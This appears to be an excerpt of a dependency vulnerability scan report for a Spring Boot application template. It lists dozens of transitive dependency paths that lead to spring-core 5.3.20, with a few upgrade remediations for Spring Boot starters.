  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
